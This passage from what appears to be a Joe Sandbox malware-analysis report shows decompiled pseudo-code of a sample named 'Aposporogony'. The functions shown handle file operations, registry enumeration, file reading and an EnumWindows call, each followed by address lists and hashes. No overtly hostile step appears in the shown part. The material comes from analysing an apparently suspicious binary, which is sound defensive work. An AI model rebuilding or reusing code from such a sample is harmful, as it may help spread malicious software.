                                                                                                                                                                                      					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
                                                                                                                                                                                      					_t27 =  *((intOrPtr*)(_t41 + 8));
                                                                                                                                                                                      					 *(_t41 - 0x60) = _t39;
                                                                                                                                                                                      					 *(_t41 - 0x5c) = _t37;
                                                                                                                                                                                      					 *((intOrPtr*)(_t41 - 0x4e)) =  *((intOrPtr*)(_t41 + 8));
                                                                                                                                                                                      					 *((short*)(_t41 - 0x58)) =  *((intOrPtr*)(_t41 - 0x20));
                                                                                                                                                                                      					E00405450(_t34, _t27);
                                                                                                                                                                                      					if(SHFileOperationW(_t41 - 0x68) != 0) {
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					E00405450(0xfffffff9, _t34); // executed
                                                                                                                                                                                      					 *((intOrPtr*)(_t41 - 4)) = 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t41 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x00402261
                                                                                                                                                                                      0x0040226a
                                                                                                                                                                                      0x00402272
                                                                                                                                                                                      0x0040227c
                                                                                                                                                                                      0x0040228f
                                                                                                                                                                                      0x00402292
                                                                                                                                                                                      0x0040229f
                                                                                                                                                                                      0x004022a9
                                                                                                                                                                                      0x004022ae
                                                                                                                                                                                      0x004022b7
                                                                                                                                                                                      0x004022ba
                                                                                                                                                                                      0x004022bd
                                                                                                                                                                                      0x004022c0
                                                                                                                                                                                      0x004022c4
                                                                                                                                                                                      0x004022d5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004022db
                                                                                                                                                                                      0x0040227e
                                                                                                                                                                                      0x0040227e
                                                                                                                                                                                      0x00402281
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0040672B: FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,77272EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,77272EE0), ref: 00406736
                                                                                                                                                                                        • Part of subcall function 0040672B: FindClose.KERNELBASE(00000000), ref: 00406742
                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 00402299
                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1486964399-0
                                                                                                                                                                                      • Opcode ID: 03f0d1a4fe4326d488d45860b81b82e85ae4865169f1f34a5415ae97f28f94b5
                                                                                                                                                                                      • Instruction ID: 1599a106608803b1ec66da4cc41fb067e70bd13a56da209b6b1b2a555e6ab78b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 03f0d1a4fe4326d488d45860b81b82e85ae4865169f1f34a5415ae97f28f94b5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B117371910304A6DB10EFF98A49A9EB7B8EF04348F10443FA805F72D5D6B8C4818B69
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                      			E004024F8(int* __ebx, intOrPtr __edx, short* __esi) {
                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                      				int* _t16;
                                                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                      				short* _t24;
                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t24 = __esi;
                                                                                                                                                                                      				_t21 = __edx;
                                                                                                                                                                                      				_t16 = __ebx;
                                                                                                                                                                                      				_t9 = E00402C81(_t29, 0x20019); // executed
                                                                                                                                                                                      				_t22 = _t9;
                                                                                                                                                                                      				_t10 = E00402C1F(3);
                                                                                                                                                                                      				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
                                                                                                                                                                                      				 *__esi = __ebx;
                                                                                                                                                                                      				if(_t22 == __ebx) {
                                                                                                                                                                                      					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					 *(_t26 + 8) = 0x3ff;
                                                                                                                                                                                      					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                                                                                                                                                                      						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                                                                                                                      						__eflags = _t13;
                                                                                                                                                                                      						if(_t13 != 0) {
                                                                                                                                                                                      							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t24[0x3ff] = _t16;
                                                                                                                                                                                      					_push(_t22); // executed
                                                                                                                                                                                      					RegCloseKey(); // executed
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x004024f8
                                                                                                                                                                                      0x004024f8
                                                                                                                                                                                      0x004024f8
                                                                                                                                                                                      0x004024fd
                                                                                                                                                                                      0x00402504
                                                                                                                                                                                      0x00402506
                                                                                                                                                                                      0x0040250e
                                                                                                                                                                                      0x00402511
                                                                                                                                                                                      0x00402514
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040251a
                                                                                                                                                                                      0x00402522
                                                                                                                                                                                      0x00402525
                                                                                                                                                                                      0x0040253e
                                                                                                                                                                                      0x00402544
                                                                                                                                                                                      0x00402546
                                                                                                                                                                                      0x00402548
                                                                                                                                                                                      0x00402548
                                                                                                                                                                                      0x00402527
                                                                                                                                                                                      0x0040252b
                                                                                                                                                                                      0x0040252b
                                                                                                                                                                                      0x0040254f
                                                                                                                                                                                      0x00402556
                                                                                                                                                                                      0x00402557
                                                                                                                                                                                      0x00402557
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm2525.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Enum$CloseValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 397863658-0
                                                                                                                                                                                      • Opcode ID: bbee1f6db7ee507cad6063d3d7c59e53d682e7d7210a55af0dd1fcce944fce73
                                                                                                                                                                                      • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbee1f6db7ee507cad6063d3d7c59e53d682e7d7210a55af0dd1fcce944fce73
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                      			E73D22A74(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				void* _t31;
                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                      				intOrPtr _t81;
                                                                                                                                                                                      				signed int _t88;
                                                                                                                                                                                      				intOrPtr _t90;
                                                                                                                                                                                      				intOrPtr _t91;
                                                                                                                                                                                      				void* _t92;
                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                      				void* _t101;
                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                      				intOrPtr _t106;
                                                                                                                                                                                      				intOrPtr _t107;
                                                                                                                                                                                      
                                                                                                                                                                                      				if( *0x73d24050 != 0 && E73D229F3(_a4) == 0) {
                                                                                                                                                                                      					 *0x73d24054 = _t106;
                                                                                                                                                                                      					if( *0x73d2404c != 0) {
                                                                                                                                                                                      						_t106 =  *0x73d2404c;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E73D22FD0(E73D229ED(), __ecx);
                                                                                                                                                                                      						 *0x73d2404c = _t106;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t31 = E73D22A2F(_a4);
                                                                                                                                                                                      				_t107 = _t106 + 4;
                                                                                                                                                                                      				if(_t31 <= 0) {
                                                                                                                                                                                      					L9:
                                                                                                                                                                                      					_t32 = E73D22A23();
                                                                                                                                                                                      					_t81 = _a4;
                                                                                                                                                                                      					_t90 =  *0x73d24058;
                                                                                                                                                                                      					 *((intOrPtr*)(_t32 + _t81)) = _t90;
                                                                                                                                                                                      					 *0x73d24058 = _t81;
                                                                                                                                                                                      					E73D22A1D();
                                                                                                                                                                                      					_t36 = EnumWindows(??, ??); // executed
                                                                                                                                                                                      					 *0x73d24034 = _t36;
                                                                                                                                                                                      					 *0x73d24038 = _t90;
                                                                                                                                                                                      					if( *0x73d24050 != 0 && E73D229F3( *0x73d24058) == 0) {
                                                                                                                                                                                      						 *0x73d2404c = _t107;
                                                                                                                                                                                      						_t107 =  *0x73d24054;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t91 =  *0x73d24058;
                                                                                                                                                                                      					_a4 = _t91;
                                                                                                                                                                                      					 *0x73d24058 =  *((intOrPtr*)(E73D22A23() + _t91));
                                                                                                                                                                                      					_t40 = E73D22A01(_t91);
                                                                                                                                                                                      					_pop(_t92);
                                                                                                                                                                                      					if(_t40 != 0) {
                                                                                                                                                                                      						_t49 = E73D22A2F(_t92);
                                                                                                                                                                                      						if(_t49 > 0) {
                                                                                                                                                                                      							_push(_t49);
                                                                                                                                                                                      							_push(E73D22A3A() + _a4 + _v8);
                                                                                                                                                                                      							_push(E73D22A44());
                                                                                                                                                                                      							if( *0x73d24050 <= 0 || E73D229F3(_a4) != 0) {
                                                                                                                                                                                      								_pop(_t101);
                                                                                                                                                                                      								_pop(_t54);
                                                                                                                                                                                      								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
                                                                                                                                                                                      								}
                                                                                                                                                                                      								asm("loop 0xfffffff5");
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_pop(_t102);
                                                                                                                                                                                      								_pop(_t58);
                                                                                                                                                                                      								 *0x73d2404c =  *0x73d2404c +  *(_t102 + _t58) * 4;
                                                                                                                                                                                      								asm("loop 0xffffffeb");
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if( *0x73d24058 == 0) {
                                                                                                                                                                                      						 *0x73d2404c = 0;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t94 = _a4 + E73D22A3A();
                                                                                                                                                                                      					 *(E73D22A48() + _t94) =  *0x73d24034;
                                                                                                                                                                                      					 *((intOrPtr*)(E73D22A4C() + _t94)) =  *0x73d24038;
                                                                                                                                                                                      					E73D22A5C(_a4);
                                                                                                                                                                                      					if(E73D22A0F() != 0) {
                                                                                                                                                                                      						 *0x73d24068 = GetLastError();
                                                                                                                                                                                      					}
                                                                                                                                                                                      					return _a4;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_push(E73D22A3A() + _a4);
                                                                                                                                                                                      				_t65 = E73D22A40();
                                                                                                                                                                                      				_v8 = _t65;
                                                                                                                                                                                      				_t88 = _t31;
                                                                                                                                                                                      				_push(_t77 + _t65 * _t88);
                                                                                                                                                                                      				_t79 = E73D22A4C();
                                                                                                                                                                                      				_t100 = E73D22A48();
                                                                                                                                                                                      				_t103 = E73D22A44();
                                                                                                                                                                                      				_t70 = _t88;
                                                                                                                                                                                      				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
                                                                                                                                                                                      					_push( *((intOrPtr*)(_t79 + _t70)));
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_push( *((intOrPtr*)(_t100 + _t70)));
                                                                                                                                                                                      				asm("loop 0xfffffff1");
                                                                                                                                                                                      				goto L9;
                                                                                                                                                                                      			}


























                                                                                                                                                                                      0x73d22a84
                                                                                                                                                                                      0x73d22a95
                                                                                                                                                                                      0x73d22aa2
                                                                                                                                                                                      0x73d22ab6
                                                                                                                                                                                      0x73d22aa4
                                                                                                                                                                                      0x73d22aa9
                                                                                                                                                                                      0x73d22aae
                                                                                                                                                                                      0x73d22aae
                                                                                                                                                                                      0x73d22aa2
                                                                                                                                                                                      0x73d22abf
                                                                                                                                                                                      0x73d22ac4
                                                                                                                                                                                      0x73d22aca
                                                                                                                                                                                      0x73d22b0e
                                                                                                                                                                                      0x73d22b0e
                                                                                                                                                                                      0x73d22b13
                                                                                                                                                                                      0x73d22b18
                                                                                                                                                                                      0x73d22b1e
                                                                                                                                                                                      0x73d22b20
                                                                                                                                                                                      0x73d22b26
                                                                                                                                                                                      0x73d22b33
                                                                                                                                                                                      0x73d22b35
                                                                                                                                                                                      0x73d22b3a
                                                                                                                                                                                      0x73d22b47
                                                                                                                                                                                      0x73d22b5a
                                                                                                                                                                                      0x73d22b60
                                                                                                                                                                                      0x73d22b66
                                                                                                                                                                                      0x73d22b67
                                                                                                                                                                                      0x73d22b6d
                                                                                                                                                                                      0x73d22b79
                                                                                                                                                                                      0x73d22b7f
                                                                                                                                                                                      0x73d22b87
                                                                                                                                                                                      0x73d22b88
                                                                                                                                                                                      0x73d22b8b
                                                                                                                                                                                      0x73d22b96
                                                                                                                                                                                      0x73d22b98
                                                                                                                                                                                      0x73d22ba4
                                                                                                                                                                                      0x73d22baa
                                                                                                                                                                                      0x73d22bb2
                                                                                                                                                                                      0x73d22bde
                                                                                                                                                                                      0x73d22bdf
                                                                                                                                                                                      0x73d22be5
                                                                                                                                                                                      0x73d22be5
                                                                                                                                                                                      0x73d22bec
                                                                                                                                                                                      0x73d22bc2
                                                                                                                                                                                      0x73d22bc2
                                                                                                                                                                                      0x73d22bc3
                                                                                                                                                                                      0x73d22bd1
                                                                                                                                                                                      0x73d22bda
                                                                                                                                                                                      0x73d22bda
                                                                                                                                                                                      0x73d22bb2
                                                                                                                                                                                      0x73d22b96
                                                                                                                                                                                      0x73d22bf5
                                                                                                                                                                                      0x73d22bf7
                                                                                                                                                                                      0x73d22bf7
                                                                                                                                                                                      0x73d22c09
                                                                                                                                                                                      0x73d22c16
                                                                                                                                                                                      0x73d22c24
                                                                                                                                                                                      0x73d22c2a
                                                                                                                                                                                      0x73d22c38
                                                                                                                                                                                      0x73d22c40
                                                                                                                                                                                      0x73d22c40
                                                                                                                                                                                      0x73d22c4e
                                                                                                                                                                                      0x73d22c4e
                                                                                                                                                                                      0x73d22ad5
                                                                                                                                                                                      0x73d22ad6
                                                                                                                                                                                      0x73d22adb
                                                                                                                                                                                      0x73d22adf
                                                                                                                                                                                      0x73d22ae4
                                                                                                                                                                                      0x73d22af8
                                                                                                                                                                                      0x73d22af9
                                                                                                                                                                                      0x73d22afa
                                                                                                                                                                                      0x73d22afc
                                                                                                                                                                                      0x73d22b01
                                                                                                                                                                                      0x73d22b03
                                                                                                                                                                                      0x73d22b03
                                                                                                                                                                                      0x73d22b06
                                                                                                                                                                                      0x73d22b0c
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2059161849.0000000073D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 73D20000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2059082131.0000000073D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059250947.0000000073D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059333077.0000000073D25000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_73d20000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EnumErrorLastWindows
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 14984897-0
                                                                                                                                                                                      • Opcode ID: 4ca74fb502107096fd854baa16e6ac9006e940aeeff9802b7e30a74f9e14f47b
                                                                                                                                                                                      • Instruction ID: f789c310c2fc71bb8a2a06983835ec432f51a3e59d6f6dcc1c34948b6f5711bb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ca74fb502107096fd854baa16e6ac9006e940aeeff9802b7e30a74f9e14f47b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2251C07340021C9FE7A1EF61DA84B593F75FB1432EF214429F809E7641E73894A0CB69
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                      			E004031D6(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                      				long _t21;
                                                                                                                                                                                      				long _t22;
                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t21 = _a4;
                                                                                                                                                                                      				if(_t21 >= 0) {
                                                                                                                                                                                      					_t32 = _t21 +  *0x42a2b8;
                                                                                                                                                                                      					 *0x418ed4 = _t32;
                                                                                                                                                                                      					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t22 = E004032DE(4);
                                                                                                                                                                                      				if(_t22 >= 0) {
                                                                                                                                                                                      					_t24 = E00405F61( *0x40a01c,  &_a4, 4); // executed
                                                                                                                                                                                      					if(_t24 == 0) {
                                                                                                                                                                                      						L18:
                                                                                                                                                                                      						_push(0xfffffffd);
                                                                                                                                                                                      						goto L19;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *0x418ed4 =  *0x418ed4 + 4;
                                                                                                                                                                                      						_t36 = E004032DE(_a4);
                                                                                                                                                                                      						if(_t36 < 0) {
                                                                                                                                                                                      							L21:
                                                                                                                                                                                      							_t22 = _t36;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							if(_a12 != 0) {
                                                                                                                                                                                      								_t26 = _a4;
                                                                                                                                                                                      								if(_t26 >= _a16) {
                                                                                                                                                                                      									_t26 = _a16;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                      									_t36 = _v8;
                                                                                                                                                                                      									 *0x418ed4 =  *0x418ed4 + _t36;
                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L18;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								if(_a4 <= 0) {
                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										_t28 = _a4;
                                                                                                                                                                                      										if(_a4 >= 0x4000) {
                                                                                                                                                                                      											_t28 = 0x4000;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_v8 = _t28;
                                                                                                                                                                                      										_t29 = E00405F61( *0x40a01c, 0x414ed0, _t28); // executed
                                                                                                                                                                                      										if(_t29 == 0) {
                                                                                                                                                                                      											goto L18;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t30 = E00405F90(_a8, 0x414ed0, _v8); // executed
                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                      											_push(0xfffffffe);
                                                                                                                                                                                      											L19:
                                                                                                                                                                                      											_pop(_t22);
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t31 = _v8;
                                                                                                                                                                                      											_a4 = _a4 - _t31;
                                                                                                                                                                                      											 *0x418ed4 =  *0x418ed4 + _t31;
                                                                                                                                                                                      											_t36 = _t36 + _t31;
                                                                                                                                                                                      											if(_a4 > 0) {
                                                                                                                                                                                      												continue;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L21;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L22;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L18;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L22:
                                                                                                                                                                                      				return _t22;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x004031da
                                                                                                                                                                                      0x004031e3
                                                                                                                                                                                      0x004031ec
                                                                                                                                                                                      0x004031f0
                                                                                                                                                                                      0x004031fb
                                                                                                                                                                                      0x004031fb
                                                                                                                                                                                      0x00403203
                                                                                                                                                                                      0x0040320a
                                                                                                                                                                                      0x0040321c
                                                                                                                                                                                      0x00403223
                                                                                                                                                                                      0x004032c8
                                                                                                                                                                                      0x004032c8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403229
                                                                                                                                                                                      0x0040322c
                                                                                                                                                                                      0x00403238
                                                                                                                                                                                      0x0040323c
                                                                                                                                                                                      0x004032d6
                                                                                                                                                                                      0x004032d6
                                                                                                                                                                                      0x00403242
                                                                                                                                                                                      0x00403245
                                                                                                                                                                                      0x004032a4
                                                                                                                                                                                      0x004032aa
                                                                                                                                                                                      0x004032ac
                                                                                                                                                                                      0x004032ac
                                                                                                                                                                                      0x004032be
                                                                                                                                                                                      0x004032c6
                                                                                                                                                                                      0x004032cd
                                                                                                                                                                                      0x004032d0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403247
                                                                                                                                                                                      0x0040324a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403250
                                                                                                                                                                                      0x00403255
                                                                                                                                                                                      0x0040325c
                                                                                                                                                                                      0x0040325f
                                                                                                                                                                                      0x00403261
                                                                                                                                                                                      0x00403261
                                                                                                                                                                                      0x0040326e
                                                                                                                                                                                      0x00403271
                                                                                                                                                                                      0x00403278
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403281
                                                                                                                                                                                      0x00403288
                                                                                                                                                                                      0x004032a0
                                                                                                                                                                                      0x004032ca
                                                                                                                                                                                      0x004032ca
                                                                                                                                                                                      0x0040328a
                                                                                                                                                                                      0x0040328a
                                                                                                                                                                                      0x0040328d
                                                                                                                                                                                      0x00403290
                                                                                                                                                                                      0x00403296
                                                                                                                                                                                      0x0040329c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040329e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040329e
                                                                                                                                                                                      0x0040329c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403288
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403255
                                                                                                                                                                                      0x0040324a
                                                                                                                                                                                      0x00403245
                                                                                                                                                                                      0x0040323c
                                                                                                                                                                                      0x00403223
                                                                                                                                                                                      0x004032d8
                                                                                                                                                                                      0x004032db

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
